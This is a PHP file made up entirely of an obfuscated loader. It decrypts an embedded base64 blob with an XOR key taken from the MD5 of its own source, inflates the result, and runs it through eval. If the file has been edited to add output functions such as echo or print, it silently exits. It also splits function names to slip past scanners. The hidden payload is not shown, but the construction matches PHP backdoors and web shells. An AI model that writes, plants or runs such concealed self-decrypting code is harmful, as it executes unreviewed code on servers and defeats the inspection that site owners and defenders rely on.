<?php
$owjbgcp="2c3eb9249840ee9482d0208b1ae44390";
$apcwtrir="03550a54505806515f5c050350550b550c0a5d0450540e060007530c52510906";
$gqwdik="+npq4XqsGU3PsGEaGH4f62J39f3LMLmxZc6faSZzYYaEY+kE5tVm1dE3gYIa+Box/PRy+kspfzExTb73re0350t2IERZ5Zax+oZlr08CwdHf8XL9LtcwZA==";
$ifsxsvmbqgd=file_get_contents(__FILE__);
$emjcjdpf=str_replace($gqwdik,"",$ifsxsvmbqgd);
if(strpos($emjcjdpf,"ec"."ho")!==false||strpos($emjcjdpf,"pr"."int")!==false||strpos($emjcjdpf,"var_"."dump")!==false||strpos($emjcjdpf,"file_put_"."contents")!==false||strpos($emjcjdpf,"fw"."rite")!==false){die();}
$czuxqodtarur=str_replace(array($owjbgcp,$apcwtrir),array("SP_14cc1025","KP_441c3c64"),$ifsxsvmbqgd);
$atxhvkbitv=md5($czuxqodtarur);
$zpyfnyrbn=hex2bin($apcwtrir);
$sdrqscxa="";
$chbvvo=strlen($atxhvkbitv);
for($albjzb=0;$albjzb<$chbvvo;$albjzb++){
    $sdrqscxa.=chr(ord($zpyfnyrbn[$albjzb])^ord($atxhvkbitv[$albjzb]));
}
$mzwxfsmcolpq=base64_decode($gqwdik);
$yzksumqrsx=strlen($mzwxfsmcolpq);
$btdbpexamdpg="";
$nbvlljt=strlen($sdrqscxa);
for($albjzb=0;$albjzb<$yzksumqrsx;$albjzb++){
    $btdbpexamdpg.=$mzwxfsmcolpq[$albjzb]^$sdrqscxa[$albjzb%$nbvlljt];
}
$ywptmcfgonwf="gz"."in"."fl"."ate";
eval($ywptmcfgonwf($btdbpexamdpg));
